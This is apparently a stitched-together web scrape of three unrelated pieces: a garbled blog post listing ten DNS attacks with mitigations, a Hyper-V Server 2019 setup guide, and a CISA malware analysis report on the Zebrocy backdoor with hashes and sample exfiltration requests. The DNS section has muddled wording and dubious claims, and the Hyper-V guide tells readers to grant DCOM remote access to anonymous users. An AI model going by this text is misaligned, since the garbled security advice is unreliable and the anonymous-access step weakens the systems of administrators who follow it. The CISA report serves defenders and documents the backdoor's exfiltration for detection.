Shockingly, as per the information both in-house and cloud applications were destroyed, the 100% growth of threats in the in-house application interlude, frothingly it is now the most widespread destruction experienced that IDC composed.

Thus the “DNS attacks are running away from real brute-force to more complicated attacks running from the internal network. Thus the complicated attack will push the organizations to use intelligent mitigation tools so that they can easily cope with insider threats.”

Therefore we have provided the top 10 DNS attacks and the proper solutions to fix them, so that it will be easy for the organizations to recognize the attacks and can quickly solve it.

Famous DNS Attacks Type:

  1. DNS Cache Poisoning Attack
  2. Distributed Reflection Denial of Service (DRDoS)
  3. DNS Hijacking
  4. Phantom Domain Attack
  5. TCP SYN Floods
  6. Random Subdomain Attack
  7. DNS Tunneling
  8. DNS Flood Attack
  9. Domain Hijacking
  10. Botnet-based Attacks

DNS Cache Poisoning Attack

At first, we have the cache poisoning, it’s one of the frequent attacks, and its main aim is to take the web users towards the scam websites, as for example, a user accesses gmail.com through the web browser to consult their mailbox.

Moreover, the DNS is becoming poisoned, and it’s not the gmail.com page which is exposed but a scam page determined by the criminal, in order, for example, to reclaim the email box accesses. Thus the users accessing the correct domain name will not see that the website they’re entering is not the right one but a scam one.

Cache poisoning

Basically, it generates an excellent possibility for cybercriminals to use phishing techniques to steal information, both identification information or credit card information from ingenuous victims. The attack can be devastating, depending on several factors, the attacker’s purpose, and the DNS poisoning impact.

DNS Attack Mitigation – Cache poisoning

As per the information, there are several forms to solve or to prevent this attack. For beginners, the IT teams should configure DNS servers to rely as small as possible on trust relations with other DNS servers. Performing so will make it more difficult for attackers to practice their DNS servers to debased their targets’ servers. There is another method to prevent cache poisoning attacks, as IT teams should also configure their DNS name servers to:-

  • To restrict recursive queries.
  • To store only data associated with the requested domain.
  • To restrict query responses to only given information about the demanded domain.

Not only this, but there are also some cache poisoning tools accessible to help organizations for preventing cache poisoning outbreaks. And the most famous cache poisoning prevention tool is the DNSSEC (Domain Name System Security Extension), a tool that is produced by the Internet Engineering Task Force, which provides reliable DNS data authentication.

Distributed Reflection Denial of Service (DRDoS)

Distributed reflective denial of service (DRDoS) attacks concentrate on bringing down the availability of an asset within an authoritative volume of UDP acknowledgments. In some instances, the attacker would transfer a DNS, NTP, etc.

They demand a parodied source IP, with the purpose of a more extensive acknowledgment being transferred to the host who indeed continues at the address that was forged.

DRDoS Attack

UDP is the protocol of different choices for this variety of attacks, as it does not build a connection state. For example, suppose a spoofed source of IP in the SYN package of a TCP connection would cause immediate termination just because the SYN/ACK will go away.

This practice makes reflection potential and possible, meanwhile, regulating these attacks at the proper scale, the idea of shared reflection becomes clear; hence, various endpoints transmitting spoofed UDP offers, generating acknowledgments that will be concentrated upon a target.

Once these response packs begin to appear, the goal experiences a loss of availability.

How to Prevent?

Usually, organizations should commence on preparing for DDoS attacks in advance, it is exceedingly harder to answer after an attack because it is already underway.

Moreover, DDoS attacks can’t be stopped, therefore some steps can be taken to make it more troublesome for an attacker to perform a network unresponsive. The following steps will help you to scatter organizational assets to bypass performing a single deep target to an attacker.

  • First, locate servers in different data centers.
  • Assure that your data centers are located on various networks.
  • Make sure that data centers have several paths.
  • Make sure that the data centers, or the networks that the data centers are related to, have no essential security holes or single points of failure.

An organization that relies on servers and Internet port, for them, it is essential to make sure that devices are geographically scattered and not located in a particular data center.

Moreover, if the resources are already geographically dispersed, then it’s essential to inspect each data station is having more than one channel to the internet and assure that not all data stations are attached to the corresponding internet provider.

DNS Hijacking

DNS hijacking is a method in which an individual can divert to the doubtful DNS (Domain Name System). However, it may be achieved by using malicious software or unauthorized alteration of a server.

DNS Hijacking

Meanwhile, the individual has the authority of the DNS; they can guide others who obtain it to a web page that seems identical but carries extra content like advertisements. They can also guide users to pages carrying malware or a third-party search engine as well.

How to Prevent?

A DNS name server is a compassionate foundation that needs necessary protection measures because it can be hijacked and used by several hackers to raise DDoS attacks on others, thus, here we have mentioned some prevention of DNS hijacking.

  • See for resolvers on your network.
  • Critically restrict access to a name server.
  • Utilize measures against cache poisoning.
  • Instantly patch known vulnerabilities.
  • Separate the authoritative name server from the resolver.
  • Restrain zone alterations.

Phantom domain attack

Phantom domain attacks are kind of comparable to casual subdomain attacks. Thus in this kind of attack, the attackers attack your DNS resolver and overpower it to use up supplies to determine that’s what we name “phantom” domains, as these phantom domains will never respond to the queries.

Phantom Domain Attack

The main motive of this attack is to let the DNS resolver server await for the answer for a long time, ultimately leading to failure or deteriorated DNS performance problems.

How to Prevent?

To identify phantom domain attacks, you can analyze your log messages. Moreover, you can also follow the steps that we have mentioned below to mitigate this attack.

  • First, increase the number of recursive clients.
  • Use a proper sequence of the following parameters to gain optimum results.
  • Restrict recursive queries per server and Restrict recursive inquiries per zone.
  • Empower to hold down for non-responsive servers and Check recursive queries per zone.

When you allow any of the options, the failure values are set at an excellent level for overall operations. However, you should keep the default charges while using these commands, moreover, it guarantees that you know the consequences if you want to replace the default values.

TCP SYN Floods

An SYN Flood is a simple form of Denial-of-Service (DDoS) attack that can target any operation related to the internet and thus implementing Transmission Control Protocol (TCP) services.

An SYN wave is a type of TCP State-Exhaustion attack that endeavors to utilize the connection element tables present in common infrastructure elements, for example, load balancers, firewalls, Intrusion Prevention Systems (IPS), and the utilization servers themselves.

TCP SYN Flooding Attack

Hence, This type of attack can bring down even high-capacity devices fitted to managing millions of links. Moreover, a TCP SYN flood attack occurs when the attacker overflows the system with SYN questions to destroy the target and make it incapable of reacting to new real connection offers.

Thus it encourages all of the target server’s information ports into a half-open state.

How to Prevent?

So, the firewalls and IPS devices, while important to network security, are not sufficient to protect a network from complex DDoS attacks.

Nowadays, the more sophisticated attack methodologies demand a multi-faceted program that allows users to look beyond both internet foundation and network availability.

Thus there are some capabilities that you can count for more powerful DDoS security and faster mitigation of TCP SYN flood attacks.

  • At first, provide proper support to both inline and out-of-band deployment to assure that there is not only one single point of collapse on the network.
  • Extensive network distinctness with the capacity to see and examine traffic from various parts of the network.
  • Different sources of threat intelligence, including statistical exception detection, customizable entrance alerts, and fingerprints of known threats that assure fast and reliable detection.

Extensible to handle attacks of all sizes, extending from low-end to high-end and high-end to low-end.

Random Subdomain Attack

This is not the most prevalent type of DNS attack, but it can happen from time to time on several networks. Hence, the random subdomain attacks can often be identified as DoS attacks, as their creation adheres to the same goal as simple DoS.

Incase, spoilers send a lot of DNS inquiries against a healthy and active domain name. However, the questions will not target the primary domain name, but it will harm a lot of non-existing subdomains.

Random Subdomain Attack

Basically, the main motive of this attack is to build a DoS that will immerse the authorized DNS server that receives the primary domain name, and finally let the interruption of all DNS record lookups.

Thus It’s an attack that’s hard to identify, as the queries will come from infected users who don’t even understand they’re sending certain types of questions, from what are eventually legitimate computers.

How to Prevent?

Thus we have provided you a simple method for preventing the random subdomain attack only in a 30-minute.

  • In the beginning, you have to learn the techniques to mitigate the attacks that generate extreme traffic on resolvers and web resources that are connected with the victim the names that can be taken down.
  • Next, Hear about modern capabilities like Response Rate Limiting for preserving DNS experts that provoke attacks.

DNS tunneling

This is a cyber attack that is used to carry encoded data from different applications inside DNS acknowledgments and queries.

DNS Tunneling

Meanwhile, this system wasn’t formerly created to attack multitudes, but to bypass interface controls, now it is mostly used to achieve remote attacks.

To implement DNS tunneling, attackers demand to gain entrance to a settled system, as well as access to an internal DNS server, a domain name, and a DNS authoritative server.

How to Prevent?

To configure the firewall to identify and block DNS tunneling by designing an application rule that uses some protocol object, we have mentioned three steps to mitigate these types of attacks.

  • Create an access rule.
  • Create a protocol object.
  • Create an application rule.

DNS Flood Attack

This is one of the most primary types of DNS attacks, and in this Distributed Denial of Service (DDoS), the intruder will hit your DNS servers.

The main motive of this kind of DNS flood is to completely overload your server so that it cannot maintain serving DNS requests because all the treated DNS zones influence the purpose of resource records.

DNS Flood Attack

Thus this kind of attack is relieved easily as the source usually comes from one single IP. However, it can get complicated when it becomes a DDoS where a hundred or thousand gatherings are involved.

While a lot of questions will be immediately identified as malicious bugs and a lot of legitimate requests will be made to mislead defense devices, hence, this makes the mitigation method a little bit difficult sometimes.

How to Prevent?

Domain Name System (DNS) has developed a target of the Distributed Denial of Service (DDoS) attacks. When a DNS is below a DDoS flood attack, all the domain data under that DNS enhances unreachable, thus ultimately creating the unavailability of those appropriate domain names.

Hence, for this type of attack, we have introduced a method that includes the periodic stale content update and manages a list of the most commonly queried domain names of several DNS servers. Hence our simulation outcomes show that our method can work more than 70% of the total cache replies during a massive DNS Flood attack.

Domain Hijacking

This type of attack involves settings in your DNS servers and domain registrar that can manage your traffic away from the actual servers to new destinations.

Domain hijacking is usually affected by a lot of determinants related to exploiting a vulnerability in the domain name registrar’s system, but can also be performed at the DNS level when attackers take command of your DNS records.

Hence when the attacker hijacked your domain name, it will be used to originate malicious movements such as installing up a fake page of repayment systems like PayPal, Visa, or bank systems. Attackers will produce an identical copy of the real website that reads critical personal knowledge, such as email addresses, usernames, and passwords.

How to Prevent?

Thus you can simply mitigate the domain hijacking by practicing a few steps that we have mentioned below.

  • Upgrade your DNS in the application foundation.
  • Use DNSSEC.
  • Secure access.
  • Client lock.

Botnet-based Attacks

If we talk about the botnet, then let me clarify that it is a number of Internet-connected devices, and it can be practiced to implement a distributed denial-of-service attack (DDoS attack), which steal data, transmit spam, and enables the attacker to obtain access to the device and its connection.

Botnet-based Attacks

Moreover, botnets are diverse and evolving threats, hence, all these attacks are bound to develop in parallel with our growing dependence on digital devices, the internet, and new future technologies.

The botnets can be counted as attacks, as well as programs for future attacks, with this as the foundational prospect, this study explores how a botnet described and organized, how it is created, and used.

How to Prevent?

This is one of the frequent DNS attacks which have been faced by the victims every day, thus to mitigate these type of attacks, we have mentioned below few steps so that it will be helpful for you.

  • At first, understand your vulnerabilities properly.
  • Next, secure the IoT devices.
  • Identify both your mitigation myths from facts.
  • Discover, classify and control.

Conclusion

As you see, DNS service is essential for preserving your companies’ websites and online assistance working day-to-day. Thus if you’re looking for methods to evade these kinds of DNS attacks, then this post will be helpful for you. So, what do you think about this? Simply share all your views and thoughts in the comment section below. And if you liked this post then simply do not forget to share this post with your friends and family.

How to Install and Configure Free Hyper-V Server 2019/2016?

Windows Hyper-V Server is a free hypervisor platform by Microsoft to run virtual machines. In this article, we’ll look on how to install and configure the latest version of Windows Hyper-V Server 2019 released in summer 2019 (this guide also applies to Windows Hyper-V Server 2016).

Hyper-V Server 2019 is suitable for those who don’t want to pay for hardware virtualization operating system. The Hyper-V has no restrictions and is free. Windows Hyper-V Server has the following benefits:

  1. Support of all popular OSs. There are no compatibility problems. All Windows and modern Linux and FreeBSD operating systems have Hyper-V support.
  2. A lot of different ways to backup virtual machines: simple scripts, open-source software, free and commercial versions of popular backup programs.
  3. Although Hyper-V Server does not have a GUI Windows Server (graphical management interface), you can manage it remotely using standard Hyper-V Manager that you can install on any computer running Windows. Now it also has a web access using the Windows Admin Center.
  4. Hyper-V Server is based on a popular server platform, familiar and easy to work with.
  5. You can install Hyper-V on a pseudoRAID, e. g., Inter RAID controller, Windows software RAID.
  6. You do not need to license your hypervisor, it is suitable for VDI or Linux VMs.
  7. Low hardware requirements. Your processor must support software virtualization (Intel-VT or VMX by Intel, AMD-V (SVM) by AMD) and second-level address translation (SLAT) (Intel EPT or AMD RV). These processor options must be enabled in BIOS/UEFI/nested host. You can find full system requirements on Microsoft website.

You should distinguish between Windows Server 2016/2019 with the standard Hyper-V role and Free Hyper-V Server 2019/2016. These are different products.

It is worth to note that if you are using a free hypervisor, you are still responsible for licensing your virtual machines. You can run any number of VMs running any opensource OS, like Linux, but you have to license your Windows virtual machines. Desktop Windows editions are licensed with a product key, and if you are using Windows Server as a guest OS, you must license it by the nuber of physical cores on your host. See more details on Windows Server licensing in virtual environment here.Contents:

  1. What’s New in Hyper-V Server 2019?
  2. How to Install Hyper-V Server 2019/2016?
  3. Using Sconfig Tool for Hyper-V Server Basic Configuration
  4. Hyper-V Server 2019 Remote Management
  5. Using PowerShell to Configure Hyper-V Server 2019
  6. How to Configure Hyper-V Server 2019 Network Settings from PowerShell?
  7. Hyper-V Server Remote Management Firewall Configuration
  8. Configuring Hyper-V Storage for Virtual Machines
  9. How to Configure Hyper-V Server Host Settings via PowerShell?
  10. Creating Hyper-V Virtual Switch

What’s New in Hyper-V Server 2019?

Let’s consider new Hyper-V Server 2019 features in brief:

  1. Shielded Virtual Machines support for Linux appeared;
  2. VM configuration version 9.0 (with hibernation support);
  3. ReFS deduplication support;
  4. Core App Compatibility: the ability to run additional graphic management panels in the Hyper-V server console;
  5. Support of 2-node Hyper-V cluster and cross-domain cluster migration

How to Install Hyper-V Server 2019/2016?

You can download Hyper-V Server 2019 ISO install image here: https://www.microsoft.com/en-us/evalcenter/evaluate-hyper-v-server-2019.

After you click Continue, a short registration form will appear. Fill in your data and select the language of the OS to be installed. Wait till the Hyper-V image download is over. The .iso file size is about 2.81GB.

Microsoft Hyper-V Server installation is standard and intuitive. It goes like in Windows 10. Just boot your server (computer) from the ISO image and follow the instructions of the installation wizard.

Using Sconfig Tool for Hyper-V Server Basic Configuration

After the installation, the system will prompt you to change the administrator password. Change it, and you will get to the hypervisor console.

Please note that Hyper-V Server does not have a familiar Windows GUI. You will have to configure most settings through the command line.

There are two windows on the desktop — the standard command prompt and the sconfig.cmd script window. You can use this script to perform the initial configuration of your Hyper-V server. Enter the number of the menu item you are going to work with in the “Enter number to select an option:” line.

  1. The first menu item allows you to join your server to an AD domain or a workgroup. In this example, we’ll join the server to the workgroup called HV-GROUP. 
  2. Change a hostname of your server.
  3. Create a local administrator user (another account, besides the built-in administrator account). I’d like to note that when you enter the local administrator password, the cursor stays in the same place. However, the password and its confirmation are successfully entered.
  4. Enable the remote access to your server. Thus, you will be able to manage it using Server Manager, MMC and PowerShell consoles, connect via RDP, check its availability using ping or tracert.
  5. Configure Windows Update. Select one of the three modes:
    • Automatic (automatic update download and installation)
    • DownloadOnly (only download without installation)
    • Manual (the administrator decides whether to download or install the updates)
  6. Download and install the latest security updates.
  7. Enable RDP access with/without NLA.
  8. Configure your network adapter settings. By default, your server receives the IP address from DHCP server. It is better to configure the static IP address here. 
  9. Set the date and time of your system.
  10. Configure the telemetry. The Hyper-V won’t allow you to disable it completely. Select the mode you want. 

You can also configure the date, time and time zone using the following command:

control timedate.cpl

Regional parameters:

control intl.cpl

These commands open standard consoles.

Note! If you have closed all windows and seen the black screen, press Ctrl+Shift+Esc. This key combination works in an RDP session as well and runs the Task Manager. You can use it to start the command prompt or the Hyper-V configuration tool (click File -> Run Task -> cmd.exe or sconfig.cmd).

Hyper-V Server 2019 Remote Management

To conveniently manage Free Hyper-V Server 2019 from the graphic interface, you can use:

  1. Windows Admin Center
  2. Hyper-V Manager — this is the method we’ll consider further (as for me, it is more convenient than WAC, at least so far)

To manage the Hyper-V Server 2016/2019, you will need a computer running Windows 10 Pro or Enterprise x64 edition.

Your Hyper-V server must be accessible by its hostname; and the A record must correspond to it on the DNS server in your domain network. In a workgroup, you will have to create the A record manually on your local DNS or add it to the hosts file on a client computer. In our case, it looks like this:

192.168.2.50 SERVERHV

If the account you are using on a client computer differs from the Hyper-V administrator account (and it should be so), you will have to explicitly save your credentials used to connect to the Hyper-V server. To do it, run this command:

cmdkey /add: SERVERHV /user:hvadmin /pass:HVPa$$word

We have specified the host and the credentials to access Hyper-V. If you have more than one server, do it for each of them.

Then start PowerShell prompt as administrator and run the following command:

winrm quickconfig
Answer YES to all questions, thus you will configure automatic startup of WinRM service and enable remote control rules in your firewall.

Add your Hyper-V server to the trusted hosts list:

Set-Item WSMan:\localhost\Client\TrustedHosts -Value "SERVERHV"

If you have multiple servers, add each of them to trusted hosts.

Run the dcomcnfg from the command prompt, and expand the Component Services -> Computers -> My Computer in it. Right-click here, select Properties and go to COM Security -> Access Permissions -> Edit Limits. In the next window check Remote Access permissions for ANONYMOUS ACCESS user.

Then let’s try to connect to the remote server. Run the Computer Management console (compmgmt.msc), right-click on the console root and select Connect to another computer.

Now you can manage the Task Scheduler, disks, services and view the event log using standard MMC consoles.

Install Hyper-V Manager on Windows 10. Open Programs and Features (optionalfeatures.exe) and go to Turn Windows Features on or off. In the next window, find Hyper-V and check Hyper-V Management Tools to install it.

The Hyper-V Manager snap-in will be installed. Start it and connect to your Hyper-V server.

Using the Hyper-V Manager to manage the hypervisor is generally beyond question. Then I’ll tell about some ways to manage a  Hyper-V Server from PowerShell.

Using PowerShell to Configure Hyper-V Server 2019

I recommend using PowerShell to configure your Hyper-V Server. Hyper-V module provides over 1,641 cmdlets to manage a Hyper-V server.

Get-Command –ModuleHyper-V | Measure-Object

Configure the automatic start of the PowerShell console after logon.

New-ItemProperty -path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run -Name PowerShell -Value "cmd /c start /max C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noExit" -Type string

After logging into the server, a PowerShell window will appear.

How to Configure Hyper-V Server 2019 Network Settings from PowerShell?

If you have not configured the network settings using sconfig.cmd, you configure them through PowerShell. Using Get-NetIPConfiguration cmdlet, you can view the current IPs configuration of network interface.

Assign a static IP address, network mask, default gateway and DNS server addresses. You can get the network adapter index (InterfaceIndex) from the results of the previous cmdlet.

New-NetIPAddress -InterfaceIndex 4 -IPAddress 192.168.1.2 -DefaultGateway 192.168.1.1 -PrefixLength 24

Set-DnsClientServerAddress -InterfaceIndex 4 -ServerAddresses 192.168.1.3,192.168.1.4

To configure IPv6, get the interface name using the Get-NetAdapter cmdlet from the PowerShell NetTCPIP module.

Check the current IPv6 setting using the following command:

Get-NetAdapterBinding -InterfaceDescription "Intel(R) PRO/1000 MT Network Connection" | Where-Object -Property DisplayName -Match IPv6 | Format-Table –AutoSize

You can disable IPv6 as follows:

Disable-NetAdapterBinding -InterfaceDescription "Intel(R) PRO/1000 MT Network Connection " -ComponentID ms_tcpip6

Hyper-V Server Remote Management Firewall Configuration

You can view the list of cmdlets to manage Windows Firewall using Get-Command:

Get-Command -Noun *Firewall* -Module NetSecurity

To fully manage your server remotely, run the following commands one by one to enable Windows Firewall allow rules :

Enable-NetFireWallRule -DisplayName "Windows Management Instrumentation (DCOM-In)"
Enable-NetFireWallRule -DisplayGroup "Remote Event Log Management"
Enable-NetFireWallRule -DisplayGroup "Remote Service Management"
Enable-NetFireWallRule -DisplayGroup "Remote Volume Management"
Enable-NetFireWallRule -DisplayGroup "Windows Firewall Defender Remote Management"
Enable-NetFireWallRule -DisplayGroup "Remote Scheduled Tasks Management"

Configuring Hyper-V Storage for Virtual Machines

We will use a separate partition on a physical disk to store data (virtual machine files and iso files). View the list of physical disks on your server.

Get-Disk

Create a new partition of the largest possible size on the drive and assign the drive letter D: to it. Use the DiskNumber from Get-Disk results.

New-Partition -DiskNumber 0 -DriveLetter D –UseMaximumSize

Then format the partition as NTFS and specify its label:

Format-Volume -DriveLetter D -FileSystem NTFS -NewFileSystemLabel "VMStorage"For more information about disk and partition management cmdlets in PowerShell, check the article PowerShell Disks and Partitions Management.

Create a directory where you will store virtual machine settings and vhdx files. The New-Item cmdlet allows you to create nested folders:

New-Item -Path "D:\HyperV\VHD" -Type Directory

Create D:\ISO folder to store OS distributions images (iso files):

New-Item -Path D:\ISO -ItemType Directory

To create a shared network folder, use the New-SmbShare cmdlet and grant full access permissions to the group of local administrators of your server:

New-SmbShare -Path D:\ISO -Name ISO -Description "OS Distributives" -FullAccess "BUILTIN\Administrators"

How to Configure Hyper-V Server Host Settings via PowerShell?

Open the Hyper-V Server host settings using this command:

Get-VMHost | Format-List

The paths of virtual machines and virtual disks are located on the same partition as your operation system. It is not correct. Specify the path to the folders created earlier using this command:

Set-VMHost -VirtualMachinePath D:\Hyper-V -VirtualHardDiskPath 'D:\HyperV\VHD'

Creating Hyper-V Virtual Switch

Create the External Switch that is connected to the Hyper-V Server phisical NIC and enable VM interaction with the physical network.

Check the SR-IOV (Single-Root Input/Output (I/O) Virtualization) support:

Get-NetAdapterSriov

Get the list of connected network adapters:

Get-NetAdapter | where {$_.status -eq "up"}

Connect your virtual switch to the network adapter and enable SR-IOV support if it is available.Hint. You won’t be able to enable or disable SR-IOV support after you create the vswitch, and you will have to re-create the switch to change this parameter.

New-VMSwitch -Name "Extenal_network" -NetAdapterName "Ethernet 2" -EnableIov 1

Use these cmdlets to check your virtual switch settings:

Get-VMSwitch
Get-NetIPConfiguration –Detailed

This completes the initial setup of Windows Hyper-V Server 2016/2019. You can move on to create and configure your virtual machines.

Source :
http://woshub.com/install-configure-free-hyper-v-server/

Malware Analysis Report (AR20-303B) MAR-10310246-1.v1 – ZEBROCY Backdoor

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

backdoor

Details
Namesmqft_exe
Size4307968 bytes
TypePE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA2560be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy6.196940
Antivirus
BitDefenderGen:Variant.Babar.17722
EmsisoftGen:Variant.Babar.17722 (B)
LavasoftGen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date1969-12-31 19:00:00-05:00
Import Hash20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5NameRaw SizeEntropy
b6114d2ef9c71d56d934ad743f66d209header10242.184050
0ead1c8fd485e916e3564c37083fb754.text19522566.048645
a5a4f98bad8aefba03b1fd8efa3e8668.data1960965.841971
96bfb1a9a7e45816c45b7d7c1bf3c578.rdata21539845.690400
916cd27c0226ce956ed74ddf600a3a94.eh_fram10244.244370
d41d8cd98f00b204e9800998ecf8427e.bss00.000000
1f825370fd049566e1e933455eb0cd06.idata25604.462264
486c39eb96458f6f5bdb80d71bb0f828.CRT5120.118370
aa692f6a7441edad64447679b7d321e8.tls5120.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI) or it can run using a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

–Begin arguments–
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
–End arguments–

When executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\Personalization\EUDC\Policies\3030304332393839394630353537343934453244.”

It also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID), and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

–Begin POST requests–

–Begin POST request sample–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228–
–End POST request sample–

–Begin POST request sample–
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108–
–End POST request sample–

–End POST requests–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details
Namesespmw_exe
Size4313600 bytes
TypePE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5e8596fd7a15ecc86abbbfdea17a9e73a
SHA1be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA2562631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA5124a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy6.197768
Antivirus
BitDefenderGen:Variant.Babar.17722
EmsisoftGen:Variant.Babar.17722 (B)
LavasoftGen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date1970-01-04 14:01:20-05:00
Import Hash20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5NameRaw SizeEntropy
2ebbe6c38d9e8d4da2449cc05f78054aheader10242.198390
a7c0885448e7013e05bf5ff61b673949.text19548166.046127
9bf966747acfa91eea3d6a1ef17cc30f.data1960965.843286
31182660fce8ae07d0350ebe456b9179.rdata21570565.696834
9eeb1eeb42e99c54c6429f9122285336.eh_fram10244.292769
d41d8cd98f00b204e9800998ecf8427e.bss00.000000
0bc884e39b3ba72fb113d63988590b5c.idata25604.424718
9bbfafc74bc296cd99dc8307ffe120ac.CRT5120.114463
2b60c482048e4a03fbb82db9c3416db5.tls5120.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an XOR and hexadecimal encoded URI. The file cannot run using a plaintext URI as compared to the other Zebrocy backdoor binary “ba9c59783b52b93aa6dfd4cfffc16f2b”. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\UserData\Multimedia\Policies\3030304332393839394630353537343934453244”.

It also collects information about the victim’s system such as username, 6 bytes of current user’s SID, and time of infection. The data is encrypted and hexadecimal encoded before exfiltrated using the predefined URI.

–Begin POST request–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db–
–End POST request–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create schedule a task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  1. Maintain up-to-date antivirus signatures and engines.
  2. Keep operating system patches up-to-date.
  3. Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  4. Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  5. Enforce a strong password policy and implement regular password changes.
  6. Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  7. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  8. Disable unnecessary services on agency workstations and servers.
  9. Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
